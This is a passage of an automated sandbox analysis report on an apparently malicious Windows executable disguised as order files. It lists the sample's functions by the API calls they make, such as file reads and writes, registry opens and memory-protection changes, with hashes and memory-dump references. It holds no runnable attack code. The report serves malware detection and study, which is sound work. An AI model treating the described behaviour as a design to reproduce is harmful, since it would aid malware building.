                                                                                    • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                    • Instruction ID: 7bb2d1eb449126eed485e4eb4fbdbafbf981390ed288ef949080c13de55397a1
                                                                                    • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                    • Instruction Fuzzy Hash: 7CC08C30314902DADA802B209F0870B3A60AB80340F154439A582E00E4CA30A445C92D
                                                                                    APIs
                                                                                    • CreateFileA.KERNELBASE(00000000), ref: 6F8A2C57
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6667289342.000000006F8A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6F8A0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6667260611.000000006F8A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6667317583.000000006F8A4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6667345099.000000006F8A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6f8a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: 6bd97a9d97f760b78a406865b04e49762b683d78738ee10b1d835130944cb0da
                                                                                    • Instruction ID: 91253500db2befc78dc800dc084858ee3998c4a0cec4c5f72acbc8bcf9d5ea37
                                                                                    • Opcode Fuzzy Hash: 6bd97a9d97f760b78a406865b04e49762b683d78738ee10b1d835130944cb0da
                                                                                    • Instruction Fuzzy Hash: 4E415972504708EBDF349F6AD985B5D3774EB45328F208CE6E8048E181E73EA4A1CBE1
                                                                                    APIs
                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,004034E4,?,?,0040332B,?,00000004,00000000,00000000,00000000), ref: 004060DB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID:
                                                                                    • API String ID: 2738559852-0
                                                                                    • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                    • Instruction ID: 1a6ac9c2f17c3bf7024e7b579d6ce6ab3b84958f313ea5b4b1ce89539a84cc3a
                                                                                    • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                    • Instruction Fuzzy Hash: 55E0EC3225026AABDF10DE55DC00EEB7BACEB053A0F018437F956E7150DA31E93197A8
                                                                                    APIs
                                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,0040349A,?,00793700,?,00793700,?,?,00000004,00000000), ref: 0040610A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3934441357-0
                                                                                    • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                    • Instruction ID: 280cd4c212b49affc14266408846aa3a30e7e9a640caac8a44b81d30c287abca
                                                                                    • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                    • Instruction Fuzzy Hash: E1E08C3221025AABCF109E908C01EEB7B6CEB043A0F014433FD16EB051D230E8319BA8
                                                                                    APIs
                                                                                    • VirtualProtect.KERNELBASE(6F8A505C,00000004,00000040,6F8A504C), ref: 6F8A2A9D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6667289342.000000006F8A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6F8A0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6667260611.000000006F8A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6667317583.000000006F8A4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6667345099.000000006F8A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6f8a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 544645111-0
                                                                                    • Opcode ID: f3fd512f0ffb299ddd90a2eb5a8574c34d7c2b179b4a75c060e6a1bdfe312120
                                                                                    • Instruction ID: 0a014a19d3b0c7f651dd6f7c7193d0fd22a3d99a9b6fe44722d990dcd76f4da5
                                                                                    • Opcode Fuzzy Hash: f3fd512f0ffb299ddd90a2eb5a8574c34d7c2b179b4a75c060e6a1bdfe312120
                                                                                    • Instruction Fuzzy Hash: 30F07FB0544B80EECF50CB2D844460E3BE0F74A324B1599AAA148DE241E37550B4DBD1
                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,?,?,?,?,?,0040644F,?,?,?,?,Call,?,00000000), ref: 004063E5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: Open
                                                                                    • String ID:
                                                                                    • API String ID: 71445658-0
                                                                                    • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                    • Instruction ID: e359b3f9d4e5954a9af9fcfc08987e0780d6658b6568ce36bf776d9a1ed3ba47
                                                                                    • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                    • Instruction Fuzzy Hash: 5AD0123210020DBBDF115F90AD01FAB771DAB08310F014826FE17E40D0D775D530A7A4
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 00404531
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: f1c7da54befd6d6a563f00396e813b8d921f3a4fa707ebac73e9c93964ba1fa7
                                                                                    • Instruction ID: 80e323bcaa4fb1d2d6ad7f8777a1edc32b6b0207238f0482179e9273dd0660e4
                                                                                    • Opcode Fuzzy Hash: f1c7da54befd6d6a563f00396e813b8d921f3a4fa707ebac73e9c93964ba1fa7
                                                                                    • Instruction Fuzzy Hash: 10C09BB57443007BDA149B509E45F17776467D4741F14C5797340F50F0C774E450D62C
                                                                                    APIs
                                                                                    • SetFilePointer.KERNELBASE(?,00000000,00000000,00403267,?), ref: 004034F5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: FilePointer
                                                                                    • String ID:
                                                                                    • API String ID: 973152223-0
                                                                                    • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                    • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                                    • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                    • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000028,?,?,00404333), ref: 00404516
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: d8acea26a230a6f6dce64032923e754adb325d86aa568b2d6d5b5dd5df397682
                                                                                    • Instruction ID: c6ab7f6cffe81da1172822363f1dd48ca364d348eecf8336b79a6db78a7c4a26
                                                                                    • Opcode Fuzzy Hash: d8acea26a230a6f6dce64032923e754adb325d86aa568b2d6d5b5dd5df397682
                                                                                    • Instruction Fuzzy Hash: 18B09235184A00ABDA515B00DE09F467B62E7A4701F008538B240640F0CBB200A0DB0A
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,004042CC), ref: 004044FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    • Opcode ID: c966d15b9c294ca5f877954a8561fb6b5762177598d7c32600178bcf5d115e9d
                                                                                    • Instruction ID: b0a400b6fcb01754b069d8f8c1c9044561b78d1e04efb9d0fff21555a903a89e
                                                                                    • Opcode Fuzzy Hash: c966d15b9c294ca5f877954a8561fb6b5762177598d7c32600178bcf5d115e9d
                                                                                    • Instruction Fuzzy Hash: DFA00176444910ABDA02AB50EF0984ABB62FBE5701B519879A286510348B365820FB19
                                                                                    APIs
                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,00406335,?,?), ref: 004061D5
                                                                                    • GetShortPathNameW.KERNEL32(?,007A4DE8,00000400), ref: 004061DE
                                                                                      • Part of subcall function 00405FA9: lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000), ref: 00405FB9
                                                                                      • Part of subcall function 00405FA9: lstrlenA.KERNEL32(?,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000), ref: 00405FEB
                                                                                    • GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 004061FB
                                                                                    • wsprintfA.USER32 ref: 00406219
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,007A55E8,C0000000,00000004,007A55E8,?), ref: 00406254
                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406263
                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 0040629B
                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,007A49E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F1
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00406302
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00406309
                                                                                      • Part of subcall function 00406044: GetFileAttributesW.KERNELBASE(?,004030E2,C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe,80000000,00000003), ref: 00406048
                                                                                      • Part of subcall function 00406044: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 0040606A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                    • String ID: %ls=%ls$[Rename]$Mz$Uz
                                                                                    • API String ID: 2171350718-3367237295
                                                                                    • Opcode ID: a33c05bce7c125d61af8aa6c61577077044d65e406db0fd5498825754e73940b
                                                                                    • Instruction ID: b6cadbeacbe634b6bd87c882f2c351c0ea44a21df7cd689b804f2f2a1cba60a5
                                                                                    • Opcode Fuzzy Hash: a33c05bce7c125d61af8aa6c61577077044d65e406db0fd5498825754e73940b
                                                                                    • Instruction Fuzzy Hash: 2F313770600715BBD2206B658D49F6B3A5CDF82714F16003EFE02F72D2DA7D982486BD
                                                                                    APIs
                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe",76BF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00406865
                                                                                    • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C), ref: 00406874
                                                                                    • CharNextW.USER32(?,"C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe",76BF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00406879
                                                                                    • CharPrevW.USER32(?,?,76BF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 0040688C
                                                                                    Strings
                                                                                    • "C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe", xrefs: 00406846
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00406803
                                                                                    • *?|<>/":, xrefs: 00406854
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
